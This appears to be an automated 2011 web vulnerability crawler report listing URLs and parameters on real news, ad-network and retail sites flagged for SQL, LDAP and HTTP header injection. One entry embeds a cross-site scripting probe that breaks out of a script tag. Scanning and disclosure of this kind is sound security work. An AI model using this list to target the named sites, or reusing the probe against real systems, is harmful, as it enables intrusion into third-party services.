Vulnerability Reports for January 29, 2011, SQL Injection, XSS

CWe-79, CWE-89, CWE-113 Report for 1-29-2011 | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Sat Jan 29 08:38:47 CST 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://4c28d6.r.axf8.net/mr/a.gif [a parameter]

1.2. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 3]

1.3. http://ad.doubleclick.net/adj/N3340.trfu/B4938104.54 [sz parameter]

1.4. http://ad.doubleclick.net/adj/cm.quadbostonherald/ [name of an arbitrarily supplied request parameter]

1.5. http://ads2.adbrite.com/v0/ad [zs parameter]

1.6. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2]

1.7. http://amch.questionmarket.com/adscgen/st.php [name of an arbitrarily supplied request parameter]

1.8. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 1]

1.9. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 3]

1.10. http://cafr.imlive.com/waccess/ [REST URL parameter 1]

1.11. http://de.imlive.com/waccess/ [REST URL parameter 1]

1.12. http://es.imlive.com/waccess/ [REST URL parameter 1]

1.13. http://fr.imlive.com/waccess/ [gotopage parameter]

1.14. http://gr.imlive.com/waccess/ [REST URL parameter 1]

1.15. http://ib.adnxs.com/getuid [User-Agent HTTP header]

1.16. http://it.imlive.com/waccess/ [REST URL parameter 1]

1.17. http://local.nissanusa.com/zip.aspx [__utmz cookie]

1.18. http://local.nissanusa.com/zip.aspx [regionalZipCode parameter]

1.19. http://local.nissanusa.com/zip.aspx [vehicle parameter]

1.20. http://nl.imlive.com/waccess/ [REST URL parameter 1]

1.21. http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx [team parameter]

1.22. http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx [team parameter]

1.23. http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx [team parameter]

1.24. http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx [team parameter]

1.25. http://tap.rubiconproject.com/oz/sensor [au cookie]

1.26. http://tap.rubiconproject.com/oz/sensor [name of an arbitrarily supplied request parameter]

1.27. http://tap.rubiconproject.com/oz/sensor [pc parameter]

1.28. http://tr.imlive.com/waccess/ [REST URL parameter 1]

1.29. http://tr.imlive.com/waccess/ [gotopage parameter]

1.30. http://twitter.com/ [Referer HTTP header]

1.31. http://twitter.com/ [original_referer cookie]

1.32. http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter]

1.33. http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter]

1.34. http://www.bostonherald.com/projects/payroll/quasi_state/ [name of an arbitrarily supplied request parameter]

1.35. http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter]

1.36. http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter]

1.37. http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter]

1.38. http://www.dominionenterprises.com/main/do/Terms_of_Use [REST URL parameter 2]

1.39. http://www.nissanusa.com/ [name of an arbitrarily supplied request parameter]

1.40. http://www.paperg.com/flyerboard/soundings-publications-llc/2123/0.html [REST URL parameter 3]

1.41. https://www.paperg.com/post.php [bid parameter]

1.42. http://www.soundingsonline.com/ [name of an arbitrarily supplied request parameter]

1.43. http://www.soundingsonline.com/about-us [name of an arbitrarily supplied request parameter]

1.44. http://www.soundingsonline.com/advertise [name of an arbitrarily supplied request parameter]

1.45. http://www.soundingsonline.com/archives [name of an arbitrarily supplied request parameter]

1.46. http://www.soundingsonline.com/boat-shop [name of an arbitrarily supplied request parameter]

1.47. http://www.soundingsonline.com/boat-shop/know-how [name of an arbitrarily supplied request parameter]

1.48. http://www.soundingsonline.com/boat-shop/new-boats [name of an arbitrarily supplied request parameter]

1.49. http://www.soundingsonline.com/boat-shop/new-gear [name of an arbitrarily supplied request parameter]

1.50. http://www.soundingsonline.com/boat-shop/on-powerboats [name of an arbitrarily supplied request parameter]

1.51. http://www.soundingsonline.com/boat-shop/on-sailboats [name of an arbitrarily supplied request parameter]

1.52. http://www.soundingsonline.com/boat-shop/q-a-a [name of an arbitrarily supplied request parameter]

1.53. http://www.soundingsonline.com/boat-shop/sea-savvy [name of an arbitrarily supplied request parameter]

1.54. http://www.soundingsonline.com/boat-shop/tech-talk [name of an arbitrarily supplied request parameter]

1.55. http://www.soundingsonline.com/boat-shop/used-boat-review [name of an arbitrarily supplied request parameter]

1.56. http://www.soundingsonline.com/calendar [name of an arbitrarily supplied request parameter]

1.57. http://www.soundingsonline.com/career-opportunities [name of an arbitrarily supplied request parameter]

1.58. http://www.soundingsonline.com/columns-blogs [name of an arbitrarily supplied request parameter]

1.59. http://www.soundingsonline.com/columns-blogs/bay-tripper [name of an arbitrarily supplied request parameter]

1.60. http://www.soundingsonline.com/columns-blogs/books [name of an arbitrarily supplied request parameter]

1.61. http://www.soundingsonline.com/columns-blogs/new-england-fishing [name of an arbitrarily supplied request parameter]

1.62. http://www.soundingsonline.com/columns-blogs/under-way [name of an arbitrarily supplied request parameter]

1.63. http://www.soundingsonline.com/component/chronocontact/ [REST URL parameter 1]

1.64. http://www.soundingsonline.com/component/chronocontact/ [REST URL parameter 2]

1.65. http://www.soundingsonline.com/component/chronocontact/ [chronoformname parameter]

1.66. http://www.soundingsonline.com/component/chronocontact/ [name of an arbitrarily supplied request parameter]

1.67. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 2]

1.68. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 3]

1.69. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 4]

1.70. http://www.soundingsonline.com/component/content/article/237622 [name of an arbitrarily supplied request parameter]

1.71. http://www.soundingsonline.com/component/mailto/ [REST URL parameter 1]

1.72. http://www.soundingsonline.com/component/mailto/ [REST URL parameter 2]

1.73. http://www.soundingsonline.com/component/mailto/ [link parameter]

1.74. http://www.soundingsonline.com/component/mailto/ [name of an arbitrarily supplied request parameter]

1.75. http://www.soundingsonline.com/component/mailto/ [tmpl parameter]

1.76. http://www.soundingsonline.com/component/yvcomment/ [REST URL parameter 1]

1.77. http://www.soundingsonline.com/component/yvcomment/ [REST URL parameter 2]

1.78. http://www.soundingsonline.com/component/yvcomment/ [name of an arbitrarily supplied request parameter]

1.79. http://www.soundingsonline.com/contact-us [name of an arbitrarily supplied request parameter]

1.80. http://www.soundingsonline.com/features [name of an arbitrarily supplied request parameter]

1.81. http://www.soundingsonline.com/features/destinations [name of an arbitrarily supplied request parameter]

1.82. http://www.soundingsonline.com/features/in-depth [name of an arbitrarily supplied request parameter]

1.83. http://www.soundingsonline.com/features/justyesterday [name of an arbitrarily supplied request parameter]

1.84. http://www.soundingsonline.com/features/lifestyle [name of an arbitrarily supplied request parameter]

1.85. http://www.soundingsonline.com/features/profiles [name of an arbitrarily supplied request parameter]

1.86. http://www.soundingsonline.com/features/technical [name of an arbitrarily supplied request parameter]

1.87. http://www.soundingsonline.com/features/type-of-boat [name of an arbitrarily supplied request parameter]

1.88. http://www.soundingsonline.com/index.php [Itemid parameter]

1.89. http://www.soundingsonline.com/index.php [chronoformname parameter]

1.90. http://www.soundingsonline.com/index.php [id parameter]

1.91. http://www.soundingsonline.com/index.php [layout parameter]

1.92. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter]

1.93. http://www.soundingsonline.com/index.php [option parameter]

1.94. http://www.soundingsonline.com/index.php [view parameter]

1.95. http://www.soundingsonline.com/more/digital-publications [name of an arbitrarily supplied request parameter]

1.96. http://www.soundingsonline.com/more/the-masters-series [name of an arbitrarily supplied request parameter]

1.97. http://www.soundingsonline.com/news [name of an arbitrarily supplied request parameter]

1.98. http://www.soundingsonline.com/news/coastwise [name of an arbitrarily supplied request parameter]

1.99. http://www.soundingsonline.com/news/dispatches [name of an arbitrarily supplied request parameter]

1.100. http://www.soundingsonline.com/news/home-waters [name of an arbitrarily supplied request parameter]

1.101. http://www.soundingsonline.com/news/mishaps-a-rescues [name of an arbitrarily supplied request parameter]

1.102. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan ['%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E parameter]

1.103. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [REST URL parameter 2]

1.104. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [REST URL parameter 2]

1.105. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [REST URL parameter 3]

1.106. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [REST URL parameter 3]

1.107. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [count cookie]

1.108. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [name of an arbitrarily supplied request parameter]

1.109. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [name of an arbitrarily supplied request parameter]

1.110. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [page parameter]

1.111. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [print parameter]

1.112. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [tmpl parameter]

1.113. http://www.soundingsonline.com/news/mishaps-a-rescues/index.php [name of an arbitrarily supplied request parameter]

1.114. http://www.soundingsonline.com/news/sailing [name of an arbitrarily supplied request parameter]

1.115. http://www.soundingsonline.com/news/todays-top-stories [name of an arbitrarily supplied request parameter]

1.116. http://www.soundingsonline.com/resources [name of an arbitrarily supplied request parameter]

1.117. http://www.soundingsonline.com/site-map [name of an arbitrarily supplied request parameter]

1.118. http://www.soundingsonline.com/subscription-services [name of an arbitrarily supplied request parameter]

1.119. http://www.soundingsonline.com/subscription-services/preview-current-issue [name of an arbitrarily supplied request parameter]

1.120. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter [name of an arbitrarily supplied request parameter]

1.121. http://www.spicefactory.org/parsley [Referer HTTP header]

1.122. http://www.spicefactory.org/parsley [User-Agent HTTP header]

2. LDAP injection

2.1. http://a.tribalfusion.com/j.ad [size parameter]

2.2. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt [NSC_betivggmf-opef cookie]

3. HTTP header injection

3.1. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [;ord parameter]

3.2. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 10]

3.3. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 11]

3.4. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 12]

3.5. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 13]

3.6. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 14]

3.7. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 15]

3.8. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 16]

3.9. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 17]

3.10. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 18]

3.11. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 19]

3.12. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 3]

3.13. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 4]

3.14. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 5]

3.15. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 6]

3.16. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 7]

3.17. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 8]

3.18. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 9]

3.19. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr parameter]

3.20. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [name of an arbitrarily supplied request parameter]

3.21. http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/ [name of an arbitrarily supplied request parameter]

3.22. http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/ [ord parameter]

3.23. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/ [name of an arbitrarily supplied request parameter]

3.24. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/ [ord parameter]

3.25. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [REST URL parameter 3]

3.26. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [REST URL parameter 4]

3.27. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [REST URL parameter 5]

3.28. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [a parameter]

3.29. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [dcc parameter]

3.30. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [dcn parameter]

3.31. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [dcp parameter]

